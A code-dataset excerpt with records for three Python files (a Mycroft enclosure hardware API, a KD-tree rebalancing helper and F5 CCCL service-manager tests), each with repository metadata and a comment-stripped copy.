Dataset schema (one row per source file; ⌀ in the viewer marks nullable columns):

| column | dtype | range | nullable |
|---|---|---|---|
| hexsha | string | length 40–40 | no |
| size | int64 | 2–1.02M | no |
| ext | string | 10 classes | no |
| lang | string | 1 class | no |
| max_stars_repo_path | string | length 4–245 | no |
| max_stars_repo_name | string | length 6–130 | no |
| max_stars_repo_head_hexsha | string | length 40–40 | no |
| max_stars_repo_licenses | list | length 1–10 | no |
| max_stars_count | int64 | 1–191k | yes |
| max_stars_repo_stars_event_min_datetime | string | length 24–24 | yes |
| max_stars_repo_stars_event_max_datetime | string | length 24–24 | yes |
| max_issues_repo_path | string | length 4–245 | no |
| max_issues_repo_name | string | length 6–130 | no |
| max_issues_repo_head_hexsha | string | length 40–40 | no |
| max_issues_repo_licenses | list | length 1–10 | no |
| max_issues_count | int64 | 1–67k | yes |
| max_issues_repo_issues_event_min_datetime | string | length 24–24 | yes |
| max_issues_repo_issues_event_max_datetime | string | length 24–24 | yes |
| max_forks_repo_path | string | length 4–245 | no |
| max_forks_repo_name | string | length 6–130 | no |
| max_forks_repo_head_hexsha | string | length 40–40 | no |
| max_forks_repo_licenses | list | length 1–10 | no |
| max_forks_count | int64 | 1–105k | yes |
| max_forks_repo_forks_event_min_datetime | string | length 24–24 | yes |
| max_forks_repo_forks_event_max_datetime | string | length 24–24 | yes |
| content | string | length 2–1.02M | no |
| avg_line_length | float64 | 1–417k | no |
| max_line_length | int64 | 1–987k | no |
| alphanum_fraction | float64 | 0–1 | no |
| content_no_comment | string | length 0–1.01M | no |
| is_comment_constant_removed | bool | 1 class | no |
| is_sharp_comment_removed | bool | 1 class | no |

---

hexsha: 1c40b043448434c4bb46287fef9905573f19eb92 | size: 13,765 | ext: py | lang: Python
max_stars: mycroft/enclosure/api.py | chrisveilleux/mycroft-core | 32557365daf69d6a5a3cb6fcf3d748abe58b6261 | ["Apache-2.0"] | count: 1 | 2020-09-03T22:33:42.000Z to 2020-09-03T22:33:42.000Z
max_issues: mycroft/enclosure/api.py | xeddmc/mycroft-core | d6cbccc0cbfbf6b540830aab4c15a32adf67b9bf | ["Apache-2.0"] | count: 2 | 2021-09-08T01:43:29.000Z to 2022-01-13T02:20:19.000Z
max_forks: mycroft/enclosure/api.py | felipehmsilveira/mycroft-ai | 8b1997e9444d0d672eded29de63bee54c7933b08 | ["Apache-2.0"] | count: null
content:
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .display_manager import DisplayManager
from mycroft.messagebus.message import Message
'''
API for the functions that affect the Mark I device.
NOTE: current state management is poorly implemented,
will be changed in the future.
'''
class EnclosureAPI:
"""
This API is intended to be used to interface with the hardware
that is running Mycroft. It exposes all possible commands which
can be sent to a Mycroft enclosure implementation.
Different enclosure implementations may implement this differently
and/or may ignore certain API calls completely. For example,
    the eyes_color() API might be ignored on a Mycroft that uses simple
LEDs which only turn on/off, or not at all on an implementation
where there is no face at all.
"""
def __init__(self, bus, name=""):
self.bus = bus
self.name = name
self.display_manager = DisplayManager(self.name)
def register(self, skill_name=""):
"""Registers a skill as active. Used for speak() and speak_dialog()
to 'patch' a previous implementation. Somewhat hacky.
"""
if self.name != "":
self.display_manager.set_active(self.name)
else:
self.display_manager.set_active(skill_name)
def reset(self):
"""The enclosure should restore itself to a started state.
Typically this would be represented by the eyes being 'open'
and the mouth reset to its default (smile or blank).
"""
self.bus.emit(Message("enclosure.reset",
context={"destination": ["enclosure"]}))
def system_reset(self):
"""The enclosure hardware should reset any CPUs, etc."""
self.bus.emit(Message("enclosure.system.reset",
context={"destination": ["enclosure"]}))
def system_mute(self):
"""Mute (turn off) the system speaker."""
self.bus.emit(Message("enclosure.system.mute",
context={"destination": ["enclosure"]}))
def system_unmute(self):
"""Unmute (turn on) the system speaker."""
self.bus.emit(Message("enclosure.system.unmute",
context={"destination": ["enclosure"]}))
def system_blink(self, times):
"""The 'eyes' should blink the given number of times.
Args:
times (int): number of times to blink
"""
self.bus.emit(Message("enclosure.system.blink", {'times': times},
context={"destination": ["enclosure"]}))
def eyes_on(self):
"""Illuminate or show the eyes."""
self.bus.emit(Message("enclosure.eyes.on",
context={"destination": ["enclosure"]}))
def eyes_off(self):
"""Turn off or hide the eyes."""
self.bus.emit(Message("enclosure.eyes.off",
context={"destination": ["enclosure"]}))
def eyes_blink(self, side):
"""Make the eyes blink
Args:
side (str): 'r', 'l', or 'b' for 'right', 'left' or 'both'
"""
self.bus.emit(Message("enclosure.eyes.blink", {'side': side},
context={"destination": ["enclosure"]}))
def eyes_narrow(self):
"""Make the eyes look narrow, like a squint"""
self.bus.emit(Message("enclosure.eyes.narrow",
context={"destination": ["enclosure"]}))
def eyes_look(self, side):
"""Make the eyes look to the given side
Args:
side (str): 'r' for right
'l' for left
'u' for up
'd' for down
'c' for crossed
"""
self.bus.emit(Message("enclosure.eyes.look", {'side': side},
context={"destination": ["enclosure"]}))
def eyes_color(self, r=255, g=255, b=255):
"""Change the eye color to the given RGB color
Args:
r (int): 0-255, red value
g (int): 0-255, green value
b (int): 0-255, blue value
"""
self.bus.emit(Message("enclosure.eyes.color",
{'r': r, 'g': g, 'b': b},
context={"destination": ["enclosure"]}))
def eyes_setpixel(self, idx, r=255, g=255, b=255):
"""Set individual pixels of the Mark 1 neopixel eyes
Args:
idx (int): 0-11 for the right eye, 12-23 for the left
r (int): The red value to apply
g (int): The green value to apply
b (int): The blue value to apply
"""
if idx < 0 or idx > 23:
raise ValueError('idx ({}) must be between 0-23'.format(str(idx)))
self.bus.emit(Message("enclosure.eyes.setpixel",
{'idx': idx, 'r': r, 'g': g, 'b': b},
context={"destination": ["enclosure"]}))
def eyes_fill(self, percentage):
"""Use the eyes as a type of progress meter
Args:
percentage (int): 0-49 fills the right eye, 50-100 also covers left
"""
if percentage < 0 or percentage > 100:
raise ValueError('percentage ({}) must be between 0-100'.
format(str(percentage)))
self.bus.emit(Message("enclosure.eyes.fill",
{'percentage': percentage},
context={"destination": ["enclosure"]}))
def eyes_brightness(self, level=30):
"""Set the brightness of the eyes in the display.
Args:
level (int): 1-30, bigger numbers being brighter
"""
self.bus.emit(Message("enclosure.eyes.level", {'level': level},
context={"destination": ["enclosure"]}))
def eyes_reset(self):
"""Restore the eyes to their default (ready) state."""
self.bus.emit(Message("enclosure.eyes.reset",
context={"destination": ["enclosure"]}))
def eyes_spin(self):
"""Make the eyes 'roll'
"""
self.bus.emit(Message("enclosure.eyes.spin",
context={"destination": ["enclosure"]}))
def eyes_timed_spin(self, length):
"""Make the eyes 'roll' for the given time.
Args:
length (int): duration in milliseconds of roll, None = forever
"""
self.bus.emit(Message("enclosure.eyes.timedspin",
{'length': length}))
def eyes_volume(self, volume):
"""Indicate the volume using the eyes
Args:
volume (int): 0 to 11
"""
if volume < 0 or volume > 11:
raise ValueError('volume ({}) must be between 0-11'.
format(str(volume)))
self.bus.emit(Message("enclosure.eyes.volume", {'volume': volume},
context={"destination": ["enclosure"]}))
def mouth_reset(self):
"""Restore the mouth display to normal (blank)"""
self.bus.emit(Message("enclosure.mouth.reset",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_talk(self):
"""Show a generic 'talking' animation for non-synched speech"""
self.bus.emit(Message("enclosure.mouth.talk",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_think(self):
"""Show a 'thinking' image or animation"""
self.bus.emit(Message("enclosure.mouth.think",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_listen(self):
"""Show a 'thinking' image or animation"""
self.bus.emit(Message("enclosure.mouth.listen",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_smile(self):
"""Show a 'smile' image or animation"""
self.bus.emit(Message("enclosure.mouth.smile",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_viseme(self, start, viseme_pairs):
""" Send mouth visemes as a list in a single message.
Arguments:
start (int): Timestamp for start of speech
viseme_pairs: Pairs of viseme id and cumulative end times
(code, end time)
codes:
0 = shape for sounds like 'y' or 'aa'
1 = shape for sounds like 'aw'
2 = shape for sounds like 'uh' or 'r'
3 = shape for sounds like 'th' or 'sh'
4 = neutral shape for no sound
5 = shape for sounds like 'f' or 'v'
6 = shape for sounds like 'oy' or 'ao'
"""
self.bus.emit(Message("enclosure.mouth.viseme_list",
{"start": start, "visemes": viseme_pairs},
context={"destination": ["enclosure"]}))
def mouth_text(self, text=""):
"""Display text (scrolling as needed)
Args:
text (str): text string to display
"""
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.mouth.text", {'text': text},
context={"destination": ["enclosure"]}))
def mouth_display(self, img_code="", x=0, y=0, refresh=True):
"""Display images on faceplate. Currently supports images up to 16x8,
or half the face. You can use the 'x' parameter to cover the other
half of the faceplate.
Args:
img_code (str): text string that encodes a black and white image
x (int): x offset for image
y (int): y offset for image
refresh (bool): specify whether to clear the faceplate before
displaying the new image or not.
Useful if you'd like to display multiple images
on the faceplate at once.
"""
self.display_manager.set_active(self.name)
self.bus.emit(Message('enclosure.mouth.display',
{'img_code': img_code,
'xOffset': x,
'yOffset': y,
'clearPrev': refresh},
context={"destination": ["enclosure"]}))
def mouth_display_png(self, image_absolute_path,
invert=False, x=0, y=0, refresh=True):
""" Send an image to the enclosure.
Args:
image_absolute_path (string): The absolute path of the image
invert (bool): inverts the image being drawn.
x (int): x offset for image
y (int): y offset for image
refresh (bool): specify whether to clear the faceplate before
displaying the new image or not.
                            Useful if you'd like to display multiple images
on the faceplate at once.
"""
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.mouth.display_image",
{'img_path': image_absolute_path,
'xOffset': x,
'yOffset': y,
'invert': invert,
'clearPrev': refresh},
context={"destination": ["enclosure"]}))
def weather_display(self, img_code, temp):
"""Show a the temperature and a weather icon
Args:
img_code (char): one of the following icon codes
0 = sunny
1 = partly cloudy
2 = cloudy
3 = light rain
4 = raining
5 = stormy
6 = snowing
7 = wind/mist
temp (int): the temperature (either C or F, not indicated)
"""
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.weather.display",
{'img_code': img_code, 'temp': temp},
context={"destination": ["enclosure"]}))
def activate_mouth_events(self):
"""Enable movement of the mouth with speech"""
self.bus.emit(Message('enclosure.mouth.events.activate',
context={"destination": ["enclosure"]}))
def deactivate_mouth_events(self):
"""Disable movement of the mouth with speech"""
self.bus.emit(Message('enclosure.mouth.events.deactivate',
context={"destination": ["enclosure"]}))
avg_line_length: 42.094801 | max_line_length: 79 | alphanum_fraction: 0.532655
content_no_comment:
from .display_manager import DisplayManager
from mycroft.messagebus.message import Message
class EnclosureAPI:
def __init__(self, bus, name=""):
self.bus = bus
self.name = name
self.display_manager = DisplayManager(self.name)
def register(self, skill_name=""):
if self.name != "":
self.display_manager.set_active(self.name)
else:
self.display_manager.set_active(skill_name)
def reset(self):
self.bus.emit(Message("enclosure.reset",
context={"destination": ["enclosure"]}))
def system_reset(self):
self.bus.emit(Message("enclosure.system.reset",
context={"destination": ["enclosure"]}))
def system_mute(self):
self.bus.emit(Message("enclosure.system.mute",
context={"destination": ["enclosure"]}))
def system_unmute(self):
self.bus.emit(Message("enclosure.system.unmute",
context={"destination": ["enclosure"]}))
def system_blink(self, times):
self.bus.emit(Message("enclosure.system.blink", {'times': times},
context={"destination": ["enclosure"]}))
def eyes_on(self):
self.bus.emit(Message("enclosure.eyes.on",
context={"destination": ["enclosure"]}))
def eyes_off(self):
self.bus.emit(Message("enclosure.eyes.off",
context={"destination": ["enclosure"]}))
def eyes_blink(self, side):
self.bus.emit(Message("enclosure.eyes.blink", {'side': side},
context={"destination": ["enclosure"]}))
def eyes_narrow(self):
self.bus.emit(Message("enclosure.eyes.narrow",
context={"destination": ["enclosure"]}))
def eyes_look(self, side):
self.bus.emit(Message("enclosure.eyes.look", {'side': side},
context={"destination": ["enclosure"]}))
def eyes_color(self, r=255, g=255, b=255):
self.bus.emit(Message("enclosure.eyes.color",
{'r': r, 'g': g, 'b': b},
context={"destination": ["enclosure"]}))
def eyes_setpixel(self, idx, r=255, g=255, b=255):
if idx < 0 or idx > 23:
raise ValueError('idx ({}) must be between 0-23'.format(str(idx)))
self.bus.emit(Message("enclosure.eyes.setpixel",
{'idx': idx, 'r': r, 'g': g, 'b': b},
context={"destination": ["enclosure"]}))
def eyes_fill(self, percentage):
if percentage < 0 or percentage > 100:
raise ValueError('percentage ({}) must be between 0-100'.
format(str(percentage)))
self.bus.emit(Message("enclosure.eyes.fill",
{'percentage': percentage},
context={"destination": ["enclosure"]}))
def eyes_brightness(self, level=30):
self.bus.emit(Message("enclosure.eyes.level", {'level': level},
context={"destination": ["enclosure"]}))
def eyes_reset(self):
self.bus.emit(Message("enclosure.eyes.reset",
context={"destination": ["enclosure"]}))
def eyes_spin(self):
self.bus.emit(Message("enclosure.eyes.spin",
context={"destination": ["enclosure"]}))
def eyes_timed_spin(self, length):
self.bus.emit(Message("enclosure.eyes.timedspin",
{'length': length}))
def eyes_volume(self, volume):
if volume < 0 or volume > 11:
raise ValueError('volume ({}) must be between 0-11'.
format(str(volume)))
self.bus.emit(Message("enclosure.eyes.volume", {'volume': volume},
context={"destination": ["enclosure"]}))
def mouth_reset(self):
self.bus.emit(Message("enclosure.mouth.reset",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_talk(self):
self.bus.emit(Message("enclosure.mouth.talk",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_think(self):
self.bus.emit(Message("enclosure.mouth.think",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_listen(self):
self.bus.emit(Message("enclosure.mouth.listen",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_smile(self):
self.bus.emit(Message("enclosure.mouth.smile",
context={"destination": ["enclosure"]}))
self.display_manager.set_active(self.name)
def mouth_viseme(self, start, viseme_pairs):
self.bus.emit(Message("enclosure.mouth.viseme_list",
{"start": start, "visemes": viseme_pairs},
context={"destination": ["enclosure"]}))
def mouth_text(self, text=""):
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.mouth.text", {'text': text},
context={"destination": ["enclosure"]}))
def mouth_display(self, img_code="", x=0, y=0, refresh=True):
self.display_manager.set_active(self.name)
self.bus.emit(Message('enclosure.mouth.display',
{'img_code': img_code,
'xOffset': x,
'yOffset': y,
'clearPrev': refresh},
context={"destination": ["enclosure"]}))
def mouth_display_png(self, image_absolute_path,
invert=False, x=0, y=0, refresh=True):
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.mouth.display_image",
{'img_path': image_absolute_path,
'xOffset': x,
'yOffset': y,
'invert': invert,
'clearPrev': refresh},
context={"destination": ["enclosure"]}))
def weather_display(self, img_code, temp):
self.display_manager.set_active(self.name)
self.bus.emit(Message("enclosure.weather.display",
{'img_code': img_code, 'temp': temp},
context={"destination": ["enclosure"]}))
def activate_mouth_events(self):
self.bus.emit(Message('enclosure.mouth.events.activate',
context={"destination": ["enclosure"]}))
def deactivate_mouth_events(self):
self.bus.emit(Message('enclosure.mouth.events.deactivate',
context={"destination": ["enclosure"]}))
is_comment_constant_removed: true | is_sharp_comment_removed: true
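
A minimal usage sketch for the EnclosureAPI above, assuming a reachable Mycroft messagebus; the skill name and colors are illustrative:

from mycroft.messagebus.client import MessageBusClient
from mycroft.enclosure.api import EnclosureAPI

bus = MessageBusClient()      # connect to the default messagebus websocket
bus.run_in_thread()

enclosure = EnclosureAPI(bus, name="demo-skill")
enclosure.register()                       # mark this skill as the active display user
enclosure.eyes_color(r=0, g=128, b=255)    # emits "enclosure.eyes.color" to the enclosure
enclosure.mouth_text("Hello, Mark I")      # scrolls text on the faceplate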

---

hexsha: 1c40b10981b4e2f7eb853180abe5bc8bdf77cde1 | size: 416 | ext: py | lang: Python
max_stars: Project Πολυδιάστατες Δομές Δεδομένων/KD_Tree/rebalance.py | DimosthenisMich/UndergraduateCeidProjects | 9f99f2c44e41d06020f3a5e9aacc0cd4357ee833 | ["MIT"] | count: 6 | 2021-02-10T18:31:22.000Z to 2022-03-03T17:49:30.000Z
max_issues: Project Πολυδιάστατες Δομές Δεδομένων/KD_Tree/rebalance.py | DimosthenisMich/UndergraduateCeidProjects | 9f99f2c44e41d06020f3a5e9aacc0cd4357ee833 | ["MIT"] | count: 1 | 2020-09-30T19:16:39.000Z to 2020-09-30T19:16:39.000Z
max_forks: Project Πολυδιάστατες Δομές Δεδομένων/KD_Tree/rebalance.py | DimitrisKostorrizos/UndergraduateCeidProjects | 9f99f2c44e41d06020f3a5e9aacc0cd4357ee833 | ["MIT"] | count: 5 | 2021-11-24T21:34:15.000Z to 2022-01-23T22:37:35.000Z
content:
import medianBuild
rebuildPoints = []
dimensions = 2
def gatherTreeNodes(node):
if node is None:
return False
rebuildPoints.append(node.node)
return gatherTreeNodes(node.leftChild), gatherTreeNodes(node.rightChild)
def balanceKdTree(node):
gatherTreeNodes(node) # Gather all the nodes of the tree
root = medianBuild.kdTreeBuild(rebuildPoints, 0) # Rebuild the tree
return root
avg_line_length: 23.111111 | max_line_length: 76 | alphanum_fraction: 0.733173
content_no_comment:
import medianBuild
rebuildPoints = []
dimensions = 2
def gatherTreeNodes(node):
if node is None:
return False
rebuildPoints.append(node.node)
return gatherTreeNodes(node.leftChild), gatherTreeNodes(node.rightChild)
def balanceKdTree(node):
gatherTreeNodes(node)
root = medianBuild.kdTreeBuild(rebuildPoints, 0)
return root
is_comment_constant_removed: true | is_sharp_comment_removed: true
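
Note that rebuildPoints is module-level state, so a second call to balanceKdTree would append to the points gathered by the first. A usage sketch under that caveat; the points list and the node attributes are assumptions inferred from the code above:

import medianBuild
import rebalance

points = [(2, 3), (5, 4), (9, 6), (4, 7), (8, 1)]   # assumed 2-D point format
root = medianBuild.kdTreeBuild(points, 0)            # build the initial tree
# ... insertions/deletions that skew the tree would go here ...
rebalance.rebuildPoints.clear()                      # reset the module-level buffer first
root = rebalance.balanceKdTree(root)                 # flatten the tree, rebuild from medians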

---

hexsha: 1c40b10c25701cd181b5ae1f090d71667f6b3c12 | size: 9,289 | ext: py | lang: Python
max_stars: f5_cccl/service/test/test_service_manager.py | f5yacobucci/f5-cccl | 64e7fa0a6d4ead9b5209b5b46bf4ed1b6cef036a | ["Apache-2.0"] | count: null
max_issues: f5_cccl/service/test/test_service_manager.py | f5yacobucci/f5-cccl | 64e7fa0a6d4ead9b5209b5b46bf4ed1b6cef036a | ["Apache-2.0"] | count: null
max_forks: f5_cccl/service/test/test_service_manager.py | f5yacobucci/f5-cccl | 64e7fa0a6d4ead9b5209b5b46bf4ed1b6cef036a | ["Apache-2.0"] | count: 1 | 2019-11-02T05:22:48.000Z to 2019-11-02T05:22:48.000Z
content:
#!/usr/bin/env python
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import pickle
import pytest
from f5_cccl.test.conftest import bigip_proxy
from f5_cccl.resource.ltm.app_service import ApplicationService
from f5_cccl.resource.ltm.virtual import VirtualServer
from f5_cccl.resource.ltm.pool import Pool
from f5_cccl.resource.ltm.monitor.http_monitor import HTTPMonitor
from f5_cccl.resource.ltm.policy.policy import Policy
from f5_cccl.resource.ltm.internal_data_group import InternalDataGroup
from f5_cccl.resource.ltm.irule import IRule
from f5_cccl.service.manager import ServiceConfigDeployer
from f5_cccl.service.manager import ServiceManager
from f5_cccl.service.config_reader import ServiceConfigReader
from mock import MagicMock
from mock import Mock
from mock import patch
@pytest.fixture
def service_manager():
partition = "test"
schema = 'f5_cccl/schemas/cccl-api-schema.yml'
service_mgr = ServiceManager(
bigip_proxy(),
partition,
schema)
return service_mgr
def test_apply_config(service_manager):
services = {}
assert service_manager.apply_config(services) == 0
class TestServiceConfigDeployer:
def setup(self):
self.bigip = bigip_proxy()
self.partition = "test"
svcfile = 'f5_cccl/schemas/tests/service.json'
with open(svcfile, 'r') as fp:
self.service = json.loads(fp.read())
config_reader = ServiceConfigReader(self.partition)
self.desired_config = config_reader.read_config(self.service)
def get_objects(self, objs, obj_type):
"""Extract objects of obj_type from the list."""
objs = [obj for obj in objs if isinstance(obj, obj_type)]
return objs
def get_created_objects(self, service_manager, obj_type):
"""Return list of created objects."""
deployer = service_manager._service_deployer
deployer._create_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._create_resources.called
args, kwargs = deployer._create_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def get_updated_objects(self, service_manager, obj_type):
"""Return list of updated objects."""
deployer = service_manager._service_deployer
deployer._update_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._update_resources.called
args, kwargs = deployer._update_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def get_deleted_objects(self, service_manager, obj_type):
"""Return list of deleted objects."""
deployer = service_manager._service_deployer
deployer._delete_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._delete_resources.called
args, kwargs = deployer._delete_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def test_create_deployer(self):
deployer = ServiceConfigDeployer(
self.bigip)
assert deployer
def test_deploy(self):
deployer = ServiceConfigDeployer(
self.bigip)
tasks_remaining = deployer.deploy(self.desired_config)
assert 0 == tasks_remaining
def test_app_services(self, service_manager):
"""Test create/update/delete of app services."""
# Should create one app service
objs = self.get_created_objects(service_manager, ApplicationService)
assert 1 == len(objs)
assert objs[0].name == 'MyAppService0'
# Should update one app service
self.service['iapps'][0]['name'] = 'MyAppService'
objs = self.get_updated_objects(service_manager, ApplicationService)
assert 1 == len(objs)
assert objs[0].name == 'MyAppService'
# Should delete two app services
self.service['iapps'] = []
objs = self.get_deleted_objects(service_manager, ApplicationService)
assert 2 == len(objs)
expected_set = set(['appsvc', 'MyAppService'])
result_set = set([objs[0].name, objs[1].name])
assert expected_set == result_set
def test_virtual_servers(self, service_manager):
"""Test create/update/delete of Virtual Servers."""
# Should create one Virtual Server
objs = self.get_created_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert objs[0].name == 'vs1'
# Should update one Virtual Server
self.service['virtualServers'][0]['name'] = 'virtual2'
objs = self.get_updated_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert objs[0].name == 'virtual2'
# Should delete one Virtual Server
self.service['virtualServers'] = []
objs = self.get_deleted_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert 'virtual2' == objs[0].name
def test_pools(self, service_manager):
"""Test create/update/delete of Pools."""
# Should create one Pool
objs = self.get_created_objects(service_manager, Pool)
assert 1 == len(objs)
assert objs[0].name == 'pool2'
# Should update one Pool
self.service['pools'][0]['name'] = 'pool1'
objs = self.get_updated_objects(service_manager, Pool)
assert 1 == len(objs)
assert objs[0].name == 'pool1'
# Should delete one Pool
self.service['pools'] = []
objs = self.get_deleted_objects(service_manager, Pool)
assert 1 == len(objs)
assert 'pool1' == objs[0].name
def test_monitors(self, service_manager):
"""Test create/update/delete of Health Monitors."""
# Should create one Monitor
objs = self.get_created_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert objs[0].name == 'myhttp'
# Should update one Monitor
self.service['monitors'][0]['name'] = 'mon_http'
objs = self.get_updated_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert objs[0].name == 'mon_http'
# Should delete one Monitor
self.service['monitors'] = []
objs = self.get_deleted_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert 'mon_http' == objs[0].name
def test_policies(self, service_manager):
"""Test create/update/delete of L7 Policies."""
# Should create one Policy
objs = self.get_created_objects(service_manager, Policy)
assert 1 == len(objs)
assert objs[0].name == 'test_wrapper_policy'
# Should update one Policy
self.service['l7Policies'][0]['name'] = 'wrapper_policy'
objs = self.get_updated_objects(service_manager, Policy)
assert 1 == len(objs)
assert objs[0].name == 'wrapper_policy'
# Should delete one Policy
self.service['l7Policies'] = []
objs = self.get_deleted_objects(service_manager, Policy)
assert 1 == len(objs)
assert 'wrapper_policy' == objs[0].name
def test_internal_data_groups(self, service_manager):
"""Test create/update/delete of Internal Data Groups."""
# Should create one Data Group
objs = self.get_created_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert objs[0].name == 'test-dgs'
# Should update one Data Group
self.service['internalDataGroups'][0]['name'] = 'test-dg'
objs = self.get_updated_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert objs[0].name == 'test-dg'
# Should delete one Data Group
self.service['internalDataGroups'] = []
objs = self.get_deleted_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert 'test-dg' == objs[0].name
def test_irules(self, service_manager):
"""Test create/update/delete of iRules."""
# Should create one iRule
objs = self.get_created_objects(service_manager, IRule)
assert 1 == len(objs)
assert objs[0].name == 'https_redirect'
# Should update one iRule
self.service['iRules'][0]['name'] = 'https_redirector'
objs = self.get_updated_objects(service_manager, IRule)
assert 1 == len(objs)
assert objs[0].name == 'https_redirector'
# Should delete one iRule
self.service['iRules'] = []
objs = self.get_deleted_objects(service_manager, IRule)
assert 1 == len(objs)
assert 'https_redirector' == objs[0].name
avg_line_length: 37.156 | max_line_length: 76 | alphanum_fraction: 0.668533
content_no_comment:
import json
import pickle
import pytest
from f5_cccl.test.conftest import bigip_proxy
from f5_cccl.resource.ltm.app_service import ApplicationService
from f5_cccl.resource.ltm.virtual import VirtualServer
from f5_cccl.resource.ltm.pool import Pool
from f5_cccl.resource.ltm.monitor.http_monitor import HTTPMonitor
from f5_cccl.resource.ltm.policy.policy import Policy
from f5_cccl.resource.ltm.internal_data_group import InternalDataGroup
from f5_cccl.resource.ltm.irule import IRule
from f5_cccl.service.manager import ServiceConfigDeployer
from f5_cccl.service.manager import ServiceManager
from f5_cccl.service.config_reader import ServiceConfigReader
from mock import MagicMock
from mock import Mock
from mock import patch
@pytest.fixture
def service_manager():
partition = "test"
schema = 'f5_cccl/schemas/cccl-api-schema.yml'
service_mgr = ServiceManager(
bigip_proxy(),
partition,
schema)
return service_mgr
def test_apply_config(service_manager):
services = {}
assert service_manager.apply_config(services) == 0
class TestServiceConfigDeployer:
def setup(self):
self.bigip = bigip_proxy()
self.partition = "test"
svcfile = 'f5_cccl/schemas/tests/service.json'
with open(svcfile, 'r') as fp:
self.service = json.loads(fp.read())
config_reader = ServiceConfigReader(self.partition)
self.desired_config = config_reader.read_config(self.service)
def get_objects(self, objs, obj_type):
objs = [obj for obj in objs if isinstance(obj, obj_type)]
return objs
def get_created_objects(self, service_manager, obj_type):
deployer = service_manager._service_deployer
deployer._create_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._create_resources.called
args, kwargs = deployer._create_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def get_updated_objects(self, service_manager, obj_type):
deployer = service_manager._service_deployer
deployer._update_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._update_resources.called
args, kwargs = deployer._update_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def get_deleted_objects(self, service_manager, obj_type):
deployer = service_manager._service_deployer
deployer._delete_resources = Mock(return_value=[])
service_manager.apply_config(self.service)
assert deployer._delete_resources.called
args, kwargs = deployer._delete_resources.call_args_list[0]
return self.get_objects(args[0], obj_type)
def test_create_deployer(self):
deployer = ServiceConfigDeployer(
self.bigip)
assert deployer
def test_deploy(self):
deployer = ServiceConfigDeployer(
self.bigip)
tasks_remaining = deployer.deploy(self.desired_config)
assert 0 == tasks_remaining
def test_app_services(self, service_manager):
objs = self.get_created_objects(service_manager, ApplicationService)
assert 1 == len(objs)
assert objs[0].name == 'MyAppService0'
self.service['iapps'][0]['name'] = 'MyAppService'
objs = self.get_updated_objects(service_manager, ApplicationService)
assert 1 == len(objs)
assert objs[0].name == 'MyAppService'
self.service['iapps'] = []
objs = self.get_deleted_objects(service_manager, ApplicationService)
assert 2 == len(objs)
expected_set = set(['appsvc', 'MyAppService'])
result_set = set([objs[0].name, objs[1].name])
assert expected_set == result_set
def test_virtual_servers(self, service_manager):
objs = self.get_created_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert objs[0].name == 'vs1'
self.service['virtualServers'][0]['name'] = 'virtual2'
objs = self.get_updated_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert objs[0].name == 'virtual2'
self.service['virtualServers'] = []
objs = self.get_deleted_objects(service_manager, VirtualServer)
assert 1 == len(objs)
assert 'virtual2' == objs[0].name
def test_pools(self, service_manager):
objs = self.get_created_objects(service_manager, Pool)
assert 1 == len(objs)
assert objs[0].name == 'pool2'
self.service['pools'][0]['name'] = 'pool1'
objs = self.get_updated_objects(service_manager, Pool)
assert 1 == len(objs)
assert objs[0].name == 'pool1'
self.service['pools'] = []
objs = self.get_deleted_objects(service_manager, Pool)
assert 1 == len(objs)
assert 'pool1' == objs[0].name
def test_monitors(self, service_manager):
objs = self.get_created_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert objs[0].name == 'myhttp'
self.service['monitors'][0]['name'] = 'mon_http'
objs = self.get_updated_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert objs[0].name == 'mon_http'
